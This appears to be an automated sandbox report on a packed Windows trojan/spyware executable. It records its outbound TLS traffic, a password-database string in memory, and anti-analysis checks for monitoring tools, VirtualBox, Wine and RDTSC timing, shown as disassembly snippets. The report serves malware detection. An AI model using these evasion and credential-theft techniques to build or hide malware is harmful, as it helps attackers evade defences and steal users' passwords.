                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49724 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49736 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49742 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49749 version: TLS 1.2

                System Summary

                barindex
                PE file contains section with special chars
                Source: onaUtwpiyq.exeStatic PE information: section name:
                Source: onaUtwpiyq.exeStatic PE information: section name: .idata
                Source: onaUtwpiyq.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeCode function: 0_3_007FB0210_3_007FB021
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeCode function: 0_3_007FB0210_3_007FB021
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeCode function: 0_3_007FB0210_3_007FB021
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeCode function: 0_3_007FB0210_3_007FB021
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeCode function: 0_3_007FB0210_3_007FB021
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeCode function: 0_3_007FB0210_3_007FB021
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeCode function: 0_3_007FB0210_3_007FB021
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeCode function: 0_3_007FB0210_3_007FB021
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeCode function: 0_3_007FB0210_3_007FB021
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeCode function: 0_3_007FB0210_3_007FB021
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeCode function: 0_3_007FB0210_3_007FB021
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeCode function: 0_3_007FB0210_3_007FB021
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeCode function: 0_3_007FC74F0_3_007FC74F
                Source: onaUtwpiyq.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: onaUtwpiyq.exeStatic PE information: Section: ZLIB complexity 0.9996680964052288
                Source: onaUtwpiyq.exeStatic PE information: Section: asctzxyj ZLIB complexity 0.994520759467411
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: onaUtwpiyq.exe, 00000000.00000003.1406953910.000000000534C000.00000004.00000800.00020000.00000000.sdmp, onaUtwpiyq.exe, 00000000.00000003.1406446946.0000000005368000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: onaUtwpiyq.exeVirustotal: Detection: 67%
                Source: onaUtwpiyq.exeReversingLabs: Detection: 60%
                Source: onaUtwpiyq.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile read: C:\Users\user\Desktop\onaUtwpiyq.exeJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: onaUtwpiyq.exeStatic file information: File size 1869312 > 1048576
                Source: onaUtwpiyq.exeStatic PE information: Raw size of asctzxyj is bigger than: 0x100000 < 0x19e400

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeUnpacked PE file: 0.2.onaUtwpiyq.exe.900000.0.unpack :EW;.rsrc:W;.idata :W; :EW;asctzxyj:EW;cphljqds:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;asctzxyj:EW;cphljqds:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: onaUtwpiyq.exeStatic PE information: real checksum: 0x1cbbde should be: 0x1ce0d3
                Source: onaUtwpiyq.exeStatic PE information: section name:
                Source: onaUtwpiyq.exeStatic PE information: section name: .idata
                Source: onaUtwpiyq.exeStatic PE information: section name:
                Source: onaUtwpiyq.exeStatic PE information: section name: asctzxyj
                Source: onaUtwpiyq.exeStatic PE information: section name: cphljqds
                Source: onaUtwpiyq.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeCode function: 0_3_007E3E5A push edi; retf 0_3_007E3EE9
                Source: onaUtwpiyq.exeStatic PE information: section name: entropy: 7.984613246074543
                Source: onaUtwpiyq.exeStatic PE information: section name: asctzxyj entropy: 7.953040311099013

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Query firmware table information (likely to detect VMs)
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeSystem information queried: FirmwareTableInformationJump to behavior
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AD4B84 second address: AD4BA5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF3D0D81736h 0x00000008 jmp 00007FF3D0D81742h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AD3BCE second address: AD3BD7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AD3BD7 second address: AD3BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AD7CFB second address: AD7D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007FF3D0F68BBAh 0x0000000b jmp 00007FF3D0F68BB4h 0x00000010 popad 0x00000011 push eax 0x00000012 jl 00007FF3D0F68BAEh 0x00000018 push ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AD7D25 second address: AD7D33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AD7D33 second address: AD7D58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007FF3D0F68BACh 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 pop edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AD7F30 second address: AD7F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AD7F34 second address: AD7F38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AD7F38 second address: AD7F3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AD7F3E second address: AD7F7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007FF3D0F68BAEh 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 jmp 00007FF3D0F68BAAh 0x0000001a pop eax 0x0000001b mov dword ptr [ebp+122D26F7h], ecx 0x00000021 lea ebx, dword ptr [ebp+12452C35h] 0x00000027 push eax 0x00000028 push esi 0x00000029 push eax 0x0000002a push edx 0x0000002b ja 00007FF3D0F68BA6h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AD806F second address: AD8092 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 add dword ptr [esp], 4BBAB99Ah 0x0000000e add edi, dword ptr [ebp+122D377Fh] 0x00000014 lea ebx, dword ptr [ebp+12452C3Eh] 0x0000001a and dh, FFFFFFF9h 0x0000001d push eax 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AD8155 second address: AD8164 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF3D0F68BAAh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AD8164 second address: AD81D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 44CCE901h 0x0000000e ja 00007FF3D0D81742h 0x00000014 jmp 00007FF3D0D8173Ch 0x00000019 push 00000003h 0x0000001b movzx ecx, bx 0x0000001e push 00000000h 0x00000020 mov dword ptr [ebp+122D1809h], ecx 0x00000026 push 00000003h 0x00000028 js 00007FF3D0D81738h 0x0000002e mov edi, ebx 0x00000030 push 6C2A7D8Ch 0x00000035 jmp 00007FF3D0D81740h 0x0000003a add dword ptr [esp], 53D58274h 0x00000041 adc ch, 0000007Ch 0x00000044 lea ebx, dword ptr [ebp+12452C49h] 0x0000004a pushad 0x0000004b mov ecx, dword ptr [ebp+122D38EFh] 0x00000051 or dword ptr [ebp+122D26F7h], edx 0x00000057 popad 0x00000058 push eax 0x00000059 pushad 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AE8CCE second address: AE8CDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF3D0F68BADh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AE8CDF second address: AE8CE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AE8CE3 second address: AE8CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: ACE19B second address: ACE1B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FF3D0D81736h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 js 00007FF3D0D81736h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: ACE1B1 second address: ACE1BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: ACE1BD second address: ACE1D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF3D0D81740h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AF4FC0 second address: AF4FC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AF4FC4 second address: AF4FCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AF5417 second address: AF542F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF3D0F68BB3h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AF542F second address: AF544F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF3D0D81745h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AF5579 second address: AF557D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AF57E1 second address: AF57E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AF57E5 second address: AF57EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AF57EB second address: AF580B instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF3D0D81738h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c jmp 00007FF3D0D81740h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AF5D60 second address: AF5D78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BACh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AF5D78 second address: AF5D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AF5D7C second address: AF5D80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AF5D80 second address: AF5DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF3D0D81736h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007FF3D0D8173Fh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AF5EFF second address: AF5F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AF60A3 second address: AF60BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0D81744h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AF60BB second address: AF60C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jnl 00007FF3D0F68BA6h 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AEB420 second address: AEB448 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0D81743h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF3D0D8173Bh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AEB448 second address: AEB453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF3D0F68BA6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AF6225 second address: AF622A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AF622A second address: AF6230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AF924D second address: AF9251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AFB23B second address: AFB242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AFB6B0 second address: AFB6B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AFA756 second address: AFA75A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AFA75A second address: AFA760 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AFA760 second address: AFA766 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B03452 second address: B0345C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF3D0D81736h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B0345C second address: B0348F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BB8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007FF3D0F68BB5h 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B0348F second address: B03494 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B028A0 second address: B028B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BB3h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B028B9 second address: B028DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF3D0D81747h 0x00000009 jmp 00007FF3D0D8173Ah 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B028DE second address: B028E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B03C12 second address: B03C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B04361 second address: B04366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B04366 second address: B0436B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B04A74 second address: B04A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF3D0F68BB5h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B04BEC second address: B04BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jg 00007FF3D0D81736h 0x0000000c rdtsc
